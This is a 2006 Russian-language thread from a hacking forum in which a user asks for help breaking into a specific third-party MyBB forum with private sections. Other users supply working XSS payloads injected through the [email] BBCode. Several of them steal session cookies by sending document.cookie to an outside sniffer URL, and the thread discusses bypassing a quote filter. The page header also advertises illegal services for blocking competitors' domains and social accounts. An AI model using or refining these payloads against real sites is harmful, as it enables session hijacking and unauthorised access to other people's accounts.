Форум АНТИЧАТ - Уязвимость движка MyBB

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Уязвимость движка MyBB

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость движка MyBB

03.07.2006, 01:14

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Отправить сообщение для Romaxa55 с помощью ICQ

Уязвимость движка MyBB

Всем привет, парни нужна помощ, такая ситуация, есть один форум, который имеет приватные разделы, переюзал множество сплоитов, в версии форума еще не уверен, в админке пишет MyBB 1.1, может ктонить чтонить посоветует, может инъекции есть? Ну вовсем кидайте сюда все, буду очень признателен. Если есть такие кто может помоч мне в деле, то стукните в асю (858476) там и спишемся.

03.07.2006, 01:23

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Отправить сообщение для SanyaX с помощью ICQ

Возможно админ умный и прикрыл все дыры. Вот и сплойты не работают, а может руки такие.

__________________
-=Ok let's Go=-
-=OpenVPN=-

03.07.2006, 01:28

Hao Asakura

Новичок

Регистрация: 23.06.2006

Сообщений: 14

Провел на форуме:
50680

Репутация: 0

Если это на рухелпе то там дырки закрыты.
По крайней мере на ipb 1.3 final сплойт не сработал.

03.07.2006, 02:02

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Парни, ну не эжто мы так просто сдадимся??? Ведь не уязвимых движков не существует. Форум американских юзеров. Поэтому врядли что либо они делали, вндь юзер по безопасности поставил бы аундификацую на админку, а там так просто все стоит, да и юзеров зарегино не много, кинтьсе линк на рабочии сплоиты (а то обычно с ошибками пишутся) буду очень признателен. Боюсь оставить линк жертвы, если кто может посмотреть, то кину в пм.

03.07.2006, 02:23

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

О да, парни я это сделал, хсс прокатило, вот сам код есди кому интересно
[*code][*email=a"onmousemove="*alert(document.cookie);"mai l@mail.ru]Нажми сюда![*/email][*/code]
(Без *)

03.07.2006, 02:41

Hao Asakura

Новичок

Регистрация: 23.06.2006

Сообщений: 14

Провел на форуме:
50680

Репутация: 0

Неуязвимых движков нет.

Ты линк дай на форум.

03.07.2006, 03:38

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Цитата:

Сообщение от Hao Asakura

Неуязвимых движков нет.

Ты линк дай на форум.

Линк я тебе отправил в ПМ
----------------------------------------------------------------------
Люди теперь я сдаюсь, сплоит

Код:

[*code][*email=a"onmousemove="alert(document.cookie);"mail@mail.ru]Нажми сюда![*/email][*/code]

работает (естественно без звездочек) а вот под сниффер чтоб работал мозгов не хватает, нужна срочно помощь (плизззз)

Последний раз редактировалось Romaxa55; 03.07.2006 в 03:44..

03.07.2006, 04:03

~~bul.666~~

Banned

Регистрация: 06.06.2006

Сообщений: 944

Провел на форуме:
3986705

Репутация: 1403

Отправить сообщение для bul.666 с помощью ICQ

Код:

[*code][*email=a"onmousemove="img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]Нажми сюда![*/email][*/code]

Поробуй так ))) Если у тебя код рабочий )))

Последний раз редактировалось Azazel; 03.07.2006 в 18:14..

03.07.2006, 05:20

Romaxa55

Участник форума

Регистрация: 19.10.2005

Сообщений: 128

Провел на форуме:
584821

Репутация: 83

Пробовал, там еще нужно <script> закодировать, но на ковычки фильтр стоит, вот думаю как их обнануть
Сплоит

Код:

[*code][*email=a"onmousemove="<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>;"mail@mail.ru]sex[*/email][*/code]

Исходник.

Код:

"><a href="mailto:a"onmousemove="&lt;script&gt;img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;&lt;/script&gt;;"mail@mail.ru">sex</a></div><br />

Как вижу фильтр стоит на ковычки <> вот терь такой вопрос, как можно обойти фильтр на ковычки?

Последний раз редактировалось Azazel; 03.07.2006 в 18:13..

#10

03.07.2006, 07:52

Cheburek

Новичок

Регистрация: 22.05.2006

Сообщений: 18

Провел на форуме:
209222

Репутация: 0

для активного хавтило бы только этого

Код:

[*code][*email=a"onmouseover=document.body.background="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;"mail@mail.ru]sex[*/email][*/code]

будет работать только в ie(хотя х/з) ... как впрочьем и вариант с img...
но здесь можно при желании по-моему и пасивное XSS сделать что-нибуть типо:

Код:

[*code][*email=a"style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`mail@mail.ru]sex[*/email][*/code]

Последний раз редактировалось Azazel; 03.07.2006 в 18:16..

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подборка уязвимостей phpBB	-=ka$at1k=-	Форумы	3	02.07.2006 15:26
Свеженькая XSS уязвимость в форуме mybb 1.10	Vantuz86	Форумы	0	11.04.2006 22:58
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ?	bike	Форумы	2	24.12.2005 17:28
Заключение MyBB	KEZ	Уязвимости	4	31.03.2005 12:51
Уязвимость в iChat'е.	-SX-	Болталка	0	15.01.2005 23:46

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход